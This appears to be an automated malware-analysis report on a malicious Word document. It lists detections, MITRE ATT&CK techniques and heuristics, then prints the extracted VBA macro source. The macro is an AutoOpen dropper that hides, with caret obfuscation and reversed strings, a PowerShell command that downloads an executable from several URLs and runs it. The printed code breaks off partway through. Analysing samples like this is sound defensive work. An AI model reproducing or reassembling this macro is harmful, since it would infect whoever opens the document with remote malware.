MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command-line process using 'cmd /V:/', likely to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Powload-6683006-0' further supports its role as a dropper.
Heuristics 5
-
ClamAV: Doc.Dropper.Powload-6683006-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powload-6683006-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5097 bytes |
SHA-256: e7fa17bea7a3cdb3a2aa5b343c263683fd769ec136a868f6f735b6397ff472a7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EwiAcaJrEiEa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim SXpODS()
ReDim SXpODS(3)
SXpODS(0) = 93
SXpODS(1) = 8992
SXpODS(2) = 9459
Dim nfbmc()
ReDim nfbmc(3)
nfbmc(0) = 293675403
nfbmc(1) = 7
nfbmc(2) = 702
Dim hYjPi()
ReDim hYjPi(3)
hYjPi(0) = 93
hYjPi(1) = 5
hYjPi(2) = 1976
Dim jWQjS()
ReDim jWQjS(4)
jWQjS(0) = 17
jWQjS(1) = 303
jWQjS(2) = 982
jWQjS(3) = 9
Dim OapZu()
ReDim OapZu(5)
OapZu(0) = 2
OapZu(1) = 9
OapZu(2) = 98834684
OapZu(3) = 55210411
OapZu(4) = 91
Dim kWsjP()
ReDim kWsjP(4)
kWsjP(0) = 7408
kWsjP(1) = 321
kWsjP(2) = 9
kWsjP(3) = 312
Dim pzhPSF()
ReDim pzhPSF(5)
pzhPSF(0) = 3
pzhPSF(1) = 414933890
pzhPSF(2) = 89
pzhPSF(3) = 962
pzhPSF(4) = 9
Shell@ LTuzuiQ + KZbIqrscsDqR + nqLzrRwnOzbkp, Format(0)
Dim SJcYtF()
ReDim SJcYtF(2)
SJcYtF(0) = 6913
SJcYtF(1) = 65
End Sub
Attribute VB_Name = "FzniJjjRVH"
Function LTuzuiQ()
On _
Error _
Resume _
Next
Dim irbnC()
ReDim irbnC(2)
irbnC(0) = 2
irbnC(1) = 58
Dim QvZWJ()
ReDim QvZWJ(3)
QvZWJ(0) = 33
QvZWJ(1) = 72780562
QvZWJ(2) = 8
Dim AzHhc()
ReDim AzHhc(5)
AzHhc(0) = 6
AzHhc(1) = 392230015
AzHhc(2) = 8
AzHhc(3) = 9014
AzHhc(4) = 75197952
Dim XtDsl()
ReDim XtDsl(5)
XtDsl(0) = 63625617
XtDsl(1) = 8
XtDsl(2) = 5
XtDsl(3) = 823
XtDsl(4) = 9
OBijuHBFaLa = Format(Chr(5 + 14 + 8 + 7 + 65)) + "md /V:/" + Format(Chr(3 + 10 + 5 + 5 + 44)) + Format(Chr(1 + 4 + 2 + 2 + 25)) + "^s^et l" + "^e= ^ ^ ^ ^ " + " ^}}" + "^{h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^t^a" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^};^k^a^er^" + "b^;" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$^ me^tI^-ek"
Dim MvTTn()
ReDim MvTTn(5)
MvTTn(0) = 997
MvTTn(1) = 2
MvTTn(2) = 409
MvTTn(3) = 9
MvTTn(4) = 8054
Dim TtCpY()
ReDim TtCpY(5)
TtCpY(0) = 517402771
TtCpY(1) = 299854020
TtCpY(2) = 91
TtCpY(3) = 5305
TtCpY(4) = 143
Dim uXRIj()
ReDim uXRIj(4)
uXRIj(0) = 350
uXRIj(1) = 34
uXRIj(2) = 640
uXRIj(3) = 385980877
Dim OjdDA()
ReDim OjdDA(5)
OjdDA(0) = 98889860
OjdDA(1) = 971
OjdDA(2) = 24
OjdDA(3) = 2
OjdDA(4) = 3998
rFqkiY = "^ovn^I^;)" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$" + "^ ,^j^p^X$(^el" + "iF^d^a^o^lnw^o^D.^w^u^I${^y" + "rt^{)ZXn$ ni^ ^j^pX$" + "(h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^a^er^of^;'^" + "e^xe.'^+^O^U^I$+^'^\^'+" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^" + "i^lbup:vne$^=" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "^ia$^" + ";^'093'^ ^= O^UI$^" + ";)'@'(tilp^S^.'J2b6^B/^tn^etn" + "o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^-^pw/r^"
Dim tZnGwA()
ReDim tZnGwA(4)
tZnGwA(0) = 878
tZnGwA(1) = 167883523
tZnGwA(2) = 3977
tZnGwA(3) = 257
zUhDioazMp = "k^.o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^.^y^ar^t^i//^:p" + "^tth@A^" + "A" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "57^Bj/ur." + Format(Chr(5 + 14 + 8 + 7 + 65)) + "i^t^s" + "i^go^lk^ta" + "//^:^pt^th@l"
Dim rIzjH()
ReDim rIzjH(5)
rIzjH(0) = 15
rIzjH(1) = 85
rIzjH(2) = 222341352
rIzjH(3) = 774
rIzjH(4) = 15414680
Dim nWPYh()
ReDim nWPYh(2)
nWPYh(0) = 7
nWPYh(1) = 9917
Dim hjSSnC()
ReDim hjSSnC(4)
hjSSnC(0) = 8
hjSSnC(1) = 3925
hjSSnC(2) = 272
hjSSnC(3) = 971
Dim hiGHL()
ReDim hiGHL(3)
hiGHL(0) = 1819
hiGHL(1) = 7321
hiGHL(2) = 3
Dim GbGfr()
ReDim GbGfr(3)
GbGfr(0) = 174
GbGfr(1) = 94
GbGfr(2) = 11
Dim fwQjB()
ReDim fwQjB(3)
fwQjB(0) = 59130641
fwQjB(1) = 72
fwQjB(2) = 62
pWfpdNuIl = "^0^k5/^s^d" + "a^o^l^pu/tne^tno" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "-pw/ra^." + "u^d^e^.pl^u.sa^moi^" + "d^ie^do" + "tut^itsn^i//^:^p^t^" + "th@4p2u^Z01/^m^o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + ".^ov^it^isopro^lav//:^ptt" + "^h^@j^A^" + "M^2U/^ur^.ely^" + "t^snusbd//^:ptth'^=^Z^Xn$^;^t"
Dim jwJMh()
ReDim jwJMh(5)
jwJMh(0) = 350988871
jwJMh
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.